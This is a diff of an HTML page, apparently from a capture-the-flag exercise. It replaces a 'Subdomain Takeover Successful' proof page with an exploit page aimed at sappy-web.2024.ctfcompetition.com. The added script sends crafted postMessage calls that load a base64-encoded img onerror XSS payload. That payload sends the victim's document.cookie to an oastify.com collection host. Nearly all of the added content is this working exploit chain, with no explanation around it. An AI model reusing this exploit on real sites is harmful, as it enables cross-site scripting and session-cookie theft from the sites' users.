--- a/index.html
+++ b/index.html
@@ -1,78 +1,28 @@
 <!DOCTYPE html>
-<html lang="en">
-<head>
-    <meta charset="UTF-8">
-    <meta http-equiv="X-UA-Compatible" content="IE=edge">
-    <meta name="viewport" content="width=device-width, initial-scale=1.0">
-    <title>Subdomain Takeover by Vivek Verma</title>
-    <style>
-        body {
-            font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif;
-            background: linear-gradient(135deg, #6a11cb, #2575fc);
-            color: #ffffff;
-            margin: 0;
-            height: 100vh;
-            display: flex;
-            justify-content: center;
-            align-items: center;
-        }
-
-        h1 {
-            font-size: 3rem;
-            color: #ff6b6b;
-            margin-bottom: 10px;
-        }
-
-        p {
-            font-size: 1.2rem;
-            line-height: 1.6;
-        }
-
-        .container {
-            background-color: rgba(255, 255, 255, 0.1);
-            padding: 30px;
-            border-radius: 15px;
-            box-shadow: 0 10px 20px rgba(0, 0, 0, 0.2);
-            max-width: 600px;
-            text-align: center;
-        }
-
-        .container strong {
-            color: #ffd700;
-        }
-
-        .container:hover {
-            box-shadow: 0 15px 30px rgba(0, 0, 0, 0.4);
-            transition: all 0.3s ease-in-out;
-        }
-
-        /* Title style with green color and white highlight */
-        .title {
-            font-size: 1.5rem;
-            font-weight: bold;
-            margin-bottom: 30px;
-            color: #00ff00; /* Neon green */
-            text-shadow: 0 0 10px #ffffff, 0 0 20px #ffffff; /* White highlight */
-        }
-
-        /* Optional animation */
-        @keyframes fadeIn {
-            from { opacity: 0; }
-            to { opacity: 1; }
-        }
-
-        .container {
-            animation: fadeIn 1.2s ease-in-out;
-        }
-    </style>
-</head>
+<html>
 <body>
-    <div class="container">
-        <div class="title">Subdomain Takeover by Vivek Verma</div>
-        <h1>Subdomain Takeover Successful!</h1>
-        <p>This subdomain was vulnerable to a takeover.</p>
-        <p><strong>Proof of Impact:</strong></p>
-        <p>Control over this subdomain has been demonstrated by uploading this custom HTML page.</p>
-    </div>
+<h1>Exploit in progress...</h1>
+<script>
+    // The magical data: URL you built in Step 3
+    const maliciousHost = "data://sappy-web.2024.ctfcompetition.com/;base64,[eyJodG1sIjoiPGltZyBzcmM9eCBvbmVycm9yPVwiZmV0Y2goJ2h0dHBzOi8vbnduN2Y3dmNudzRpY29weWtzZDVjYTI2cXh3b2tvOGQub2FzdGlmeS5jb20vP2Nvb2tpZT0nICsgZG9jdW1lbnQuY29va2llKVwiPiJ9]#";
+
+    // Open the vulnerable part of the target site
+    const targetWindow = window.open("https://sappy-web.2024.ctfcompetition.com/sap.html");
+
+    // Give it a moment to load
+    setTimeout(() => {
+        // Send the message to configure the iframe with our malicious host
+        targetWindow.postMessage(JSON.stringify({
+            "method": "initialize",
+            "host": maliciousHost
+        }), '*');
+
+        // Send the message to render, which triggers the fetch and XSS
+        targetWindow.postMessage(JSON.stringify({
+            "method": "render",
+            "page": "pwned"
+        }), '*');
+    }, 2000); // 2 seconds should be plenty
+</script>
 </body>
 </html>
